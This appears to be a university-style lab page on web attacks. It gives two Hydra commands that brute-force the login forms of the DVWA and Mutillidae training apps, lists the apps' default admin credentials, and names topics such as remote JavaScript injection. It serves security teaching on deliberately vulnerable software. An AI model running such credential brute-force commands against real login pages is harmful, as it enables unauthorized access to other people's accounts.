[ Log On ]
  • Home
  • Tst
  • Cha
  • Enc
  • Code
  • IP
  • Fun
  • Sub
  • DigF
  • Cis
  • Com
  • Db
  • About
  • Netsim

Scripts

Hydra for DVWA:

hydra -L list_user -P list_password [IP META] http-post-form '/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed'
      

Hydra for Multillidae:

hydra -L list_user -P list_password [IP META] http-post-form '/mutillidae/index.php?page=login.php:username=^USER^&password=^PASS^&login-php-submit-button=Login:Not Logged In'
      

Part 1

Part 2

Part 3

Part 4

Part 5

Lab 5: Web Attacks

[Back] This outlines the Web Attacks [Lab 5]

Link Modification (page 8)

Remote JavaScript Injection (page 9)

Demo

The video stalls, but here is another one which may capture the part that is missing:

A few hints

  • Details for Mutillidae: admin, Password: adminpass
  • Details for Damn Vulnerable Web App (DVWA): User: admin, Password: password